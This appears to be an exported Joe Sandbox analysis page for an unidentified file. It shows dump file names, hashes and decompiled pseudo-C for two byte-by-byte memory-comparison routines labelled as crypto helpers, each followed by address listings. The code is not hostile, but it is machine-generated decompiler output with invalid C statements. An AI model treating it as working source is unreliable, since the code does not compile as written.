Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 144acdfd973fb8ec8715c7f4419198ed2d4f89f883bf0220480da0df66efcc4b
Instruction ID: 6931729a02fb847199ce074a6f119abe14e9e9e10058b920d1c0beec92f8c6f2
Opcode Fuzzy Hash: 144acdfd973fb8ec8715c7f4419198ed2d4f89f883bf0220480da0df66efcc4b
Instruction Fuzzy Hash: 9CF1BB71A483018FC754CE28D49053ABBE1FFC9398F24AA2EF4DAA7251D630E9458B52

Uniqueness

Uniqueness Score: -1.00%

Function 00E80DE3 Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00E80DE3(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}

0x00e80de3
0x00e80de3
0x00e80de9
0x00e80e70
0x00e80e72
0x00e80e74
0x00000000
0x00000000
0x00e80e7a
0x00e80e80
0x00e80f07
0x00e80f09
0x00e80f0b
0x00000000
0x00000000
0x00e80f11
0x00e80f17
0x00e80f9e
0x00e80fa0
0x00e80fa2
0x00000000
0x00000000
0x00e80fa8
0x00e80fae
0x00e81035
0x00e81037
0x00e81039
0x00000000
0x00000000
0x00e8103f
0x00e81045
0x00e810cc
0x00e810ce
0x00e810d0
0x00000000
0x00000000
0x00e810dc
0x00e81164
0x00e81166
0x00e81168
0x00000000
0x00000000
0x00e8116e
0x00e81174
0x00e811fb
0x00e811fd
0x00e811ff
0x00e811ff
0x00000000
0x00e811ff
0x00e81181
0x00e81183
0x00e8119b
0x00e811a3
0x00e811a5
0x00e811bd
0x00e811c5
0x00e811c7
0x00e811df
0x00e811e7
0x00e811e9
0x00e811f2
0x00e811f2
0x00000000
0x00e811e9
0x00e811d0
0x00e811d9
0x00000000
0x00000000
0x00000000
0x00e811d9
0x00e811ae
0x00e811b7
0x00000000
0x00000000
0x00000000
0x00e811b7
0x00e8118c
0x00e81195
0x00000000
0x00000000
0x00000000
0x00e81195
0x00e810ea
0x00e810ec
0x00e81104
0x00e8110c
0x00e8110e
0x00e81126
0x00e8112e
0x00e81130
0x00e81148
0x00e81150
0x00e81152
0x00e8115b
0x00e8115b
0x00000000
0x00e81152
0x00e81139
0x00e81142
0x00000000
0x00000000
0x00000000
0x00e81142
0x00e81117
0x00e81120
0x00000000
0x00000000
0x00000000
0x00e81120
0x00e810f5
0x00e810fe
0x00000000
0x00000000
0x00000000
0x00e810fe
0x00e81052
0x00e81054
0x00e8106c
0x00e81074
0x00e81076
0x00e8108e
0x00e81096
0x00e81098
0x00e810b0
0x00e810b8
0x00e810ba
0x00e810c3
0x00e810c3
0x00000000
0x00e810ba
0x00e810a1
0x00e810aa
0x00000000
0x00000000
0x00000000
0x00e810aa
0x00e8107f
0x00e81088
0x00000000
0x00000000
0x00000000
0x00e81088
0x00e8105d
0x00e81066
0x00000000
0x00000000
0x00000000
0x00e81066
0x00e80fbb
0x00e80fbd
0x00e80fd5
0x00e80fdd
0x00e80fdf
0x00e80ff7
0x00e80fff
0x00e81001
0x00e81019
0x00e81021
0x00e81023
0x00e8102c
0x00e8102c
0x00000000
0x00e81023
0x00e8100a
0x00e81013
0x00000000
0x00000000
0x00000000
0x00e81013
0x00e80fe8
0x00e80ff1
0x00000000
0x00000000
0x00000000
0x00e80ff1
0x00e80fc6
0x00e80fcf
0x00000000
0x00000000
0x00000000
0x00e80fcf
0x00e80f24
0x00e80f26
0x00e80f3e
0x00e80f46
0x00e80f48
0x00e80f60
0x00e80f68
0x00e80f6a
0x00e80f82
0x00e80f8a
0x00e80f8c
0x00e80f95
0x00e80f95
0x00000000
0x00e80f8c
0x00e80f73
0x00e80f7c
0x00000000
0x00000000
0x00000000
0x00e80f7c
0x00e80f51
0x00e80f5a
0x00000000
0x00000000
0x00000000
0x00e80f5a
0x00e80f2f
0x00e80f38
0x00000000
0x00000000
0x00000000
0x00e80f38
0x00e80e8d
0x00e80e8f
0x00e80ea7
0x00e80eaf
0x00e80eb1
0x00e80ec9
0x00e80ed1
0x00e80ed3
0x00e80eeb
0x00e80ef3
0x00e80ef5
0x00e80efe
0x00e80efe
0x00000000
0x00e80ef5
0x00e80edc
0x00e80ee5
0x00000000
0x00000000
0x00000000
0x00e80ee5
0x00e80eba
0x00e80ec3
0x00000000
0x00000000
0x00000000
0x00e80ec3
0x00e80e98
0x00e80ea1
0x00000000
0x00000000
0x00000000
0x00e80def
0x00e80def
0x00e80df6
0x00e80df8
0x00e80e10
0x00e80e10
0x00e80e18
0x00e80e1a
0x00e80e32
0x00e80e32
0x00e80e3a
0x00e80e3c
0x00e80e54
0x00e80e54
0x00e80e5c
0x00e80e5e
0x00e80e67
0x00e80e67
0x00000000
0x00e80e5e
0x00e80e42
0x00e80e45
0x00e80e4e
0x00e809a6
0x00e809a6
0x00e81797
0x00e81797
0x00000000
0x00e80e4e
0x00e80e20
0x00e80e23
0x00e80e2c
0x00000000
0x00000000
0x00000000
0x00e80e2c
0x00e80dfe
0x00e80e01
0x00e80e0a
0x00000000
0x00000000
0x00000000
0x00e80e0a

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: ce266a61ecf2940906f280a79b7ad662907352638bf2e2634a49d8d929dd1da7
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 09C1A0322050930AEFAD5639853443FBAA15AE27B531A279DD4FFEB0D5FE20C568D720

Uniqueness

Uniqueness Score: -1.00%

Function 00E81218 Relevance: .3, Instructions: 341
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00E81218(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}

0x00e81218
0x00e81218
0x00e8121e
0x00e812a6
0x00e812a8
0x00e812aa
0x00000000
0x00000000
0x00e812b0
0x00e812b6
0x00e8133d
0x00e8133f
0x00e81341
0x00000000
0x00000000
0x00e81347
0x00e8134d
0x00e813d4
0x00e813d6
0x00e813d8
0x00000000
0x00000000
0x00e813de
0x00e813e4
0x00e8146b
0x00e8146d
0x00e8146f
0x00000000
0x00000000
0x00e8147b
0x00e81503
0x00e81505
0x00e81507
0x00000000
0x00000000
0x00e8150d
0x00e81513
0x00e8159a
0x00e8159c
0x00e8159e
0x00000000
0x00000000
0x00e815a4
0x00e815aa
0x00e81631
0x00e81633
0x00e81635
0x00000000
0x00000000
0x00e81643
0x00e81645
0x00e8165d
0x00e81665
0x00e81667
0x00e80dc0
0x00e80dc8
0x00e80dca
0x00e80dd7
0x00e80dd7
0x00000000
0x00e80dca
0x00e81674
0x00e80dba
0x00000000
0x00000000
0x00000000
0x00000000
0x00e80dba
0x00e8164e
0x00e81657
0x00000000
0x00000000
0x00000000
0x00e81657
0x00e815b7
0x00e815b9
0x00e815d1
0x00e815d9
0x00e815db
0x00e815f3
0x00e815fb
0x00e815fd
0x00e81615
0x00e8161d
0x00e8161f
0x00e81628
0x00e81628
0x00000000
0x00e8161f
0x00e81606
0x00e8160f
0x00000000
0x00000000
0x00000000
0x00e8160f
0x00e815e4
0x00e815ed
0x00000000
0x00000000
0x00000000
0x00e815ed
0x00e815c2
0x00e815cb
0x00000000
0x00000000
0x00000000
0x00e815cb
0x00e81520
0x00e81522
0x00e8153a
0x00e81542
0x00e81544
0x00e8155c
0x00e81564
0x00e81566
0x00e8157e
0x00e81586
0x00e81588
0x00e81591
0x00e81591
0x00000000
0x00e81588
0x00e8156f
0x00e81578
0x00000000
0x00000000
0x00000000
0x00e81578
0x00e8154d
0x00e81556
0x00000000
0x00000000
0x00000000
0x00e81556
0x00e8152b
0x00e81534
0x00000000
0x00000000
0x00000000
0x00e81534
0x00e81489
0x00e8148b
0x00e814a3
0x00e814ab
0x00e814ad
0x00e814c5
0x00e814cd
0x00e814cf
0x00e814e7
0x00e814ef
0x00e814f1
0x00e814fa
0x00e814fa
0x00000000
0x00e814f1
0x00e814d8
0x00e814e1
0x00000000
0x00000000
0x00000000
0x00e814e1
0x00e814b6
0x00e814bf
0x00000000
0x00000000
0x00000000
0x00e814bf
0x00e81494
0x00e8149d
0x00000000
0x00000000
0x00000000
0x00e8149d
0x00e813f1
0x00e813f3
0x00e8140b
0x00e81413
0x00e81415
0x00e8142d
0x00e81435
0x00e81437
0x00e8144f
0x00e81457
0x00e81459
0x00e81462
0x00e81462
0x00000000
0x00e81459
0x00e81440
0x00e81449
0x00000000
0x00000000
0x00000000
0x00e81449
0x00e8141e
0x00e81427
0x00000000
0x00000000
0x00000000
0x00e81427
0x00e813fc
0x00e81405
0x00000000
0x00000000
0x00000000
0x00e81405
0x00e8135a
0x00e8135c
0x00e81374
0x00e8137c
0x00e8137e
0x00e81396
0x00e8139e
0x00e813a0
0x00e813b8
0x00e813c0
0x00e813c2
0x00e813cb
0x00e813cb
0x00000000
0x00e813c2
0x00e813a9
0x00e813b2
0x00000000
0x00000000
0x00000000
0x00e813b2
0x00e81387
0x00e81390
0x00000000
0x00000000
0x00000000
0x00e81390
0x00e81365
0x00e8136e
0x00000000
0x00000000
0x00000000
0x00e8136e
0x00e812c3
0x00e812c5
0x00e812dd
0x00e812e5
0x00e812e7
0x00e812ff
0x00e81307
0x00e81309
0x00e81321
0x00e81329
0x00e8132b
0x00e81334
0x00e81334
0x00000000
